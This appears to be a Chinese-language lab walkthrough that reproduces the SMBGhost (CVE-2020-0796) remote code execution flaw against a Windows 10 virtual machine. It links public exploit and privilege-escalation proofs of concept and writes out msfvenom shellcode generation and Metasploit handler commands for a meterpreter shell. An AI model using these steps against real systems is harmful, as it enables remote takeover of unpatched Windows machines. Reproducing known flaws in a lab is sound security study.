CVE-2020-0796：微软 SMBv3 协议RCE复现

简介

SMB(全称是Server Message Block)是一个协议名，它能被用于Web连接和客户端与服务器之间的信息沟通。

漏洞概述

(CVE-2020-0796 SMBGhost)该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的，它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。该漏洞的后果十分接近永恒之蓝系列，都利用Windows SMB漏洞远程攻击获取系统最高权限，WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。

影响版本

适用于32位系统的Windows 10版本1903

Windows 10 1903版（用于基于x64的系统）

Windows 10 1903版（用于基于ARM64的系统）

Windows Server 1903版（服务器核心安装）

适用于32位系统的Windows 10版本1909

Windows 10版本1909（用于基于x64的系统）

Windows 10 1909版（用于基于ARM64的系统）

Windows Server版本1909（服务器核心安装）

这里是我使用的Windows10版本的靶机

环境搭建 Kali虚拟机以及windows10虚拟机 可在虚拟机中搭建win10系统来进行复现。迅雷链接：

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/

使用扫描工具来验证是否由该漏洞

https://github.com/ollypwn/SMBGhost

可以看到该版本是具有SMBv3 RCE漏洞的

漏洞复现 EXP地址：

https://github.com/chompie1337/SMBGhost_RCE_PoC

该exp使用环境为python3 下载完成后将该exp放到Kali虚拟机中 启动msf，使用msf生成shellcode 命令为：

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

如果不输入为txt就使用这一条

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python

执行该命令后会在同目录下生成一个shellcode.txt，将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD保存即可。

替换到exploit.py里面。注意这里MSF给出的是buf 在exploit.py里面是USER_PAYLOAD 这个需要修改一下

修改好了exp文件之后，在MSF上面设置监听

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 8888

set rhost 192.168.8.138

run

使用exp对windows进行反弹shell。这里成功了并且没有蓝屏的现象

蓝屏的POC。这个POC可以把由这个漏洞的windows10系统打到蓝屏

https://github.com/eerykitty/CVE-2020-0796-PoC

在执行的时候需要注意要安装一些包和注意路径的问题

本地提权POC

https://github.com/danigargu/CVE-2020-0796

编译好了的版本如下：

https://github.com/danigargu/CVE-2020-0796/releases

渗透测试 红队攻防 免杀 权限维持 等等技术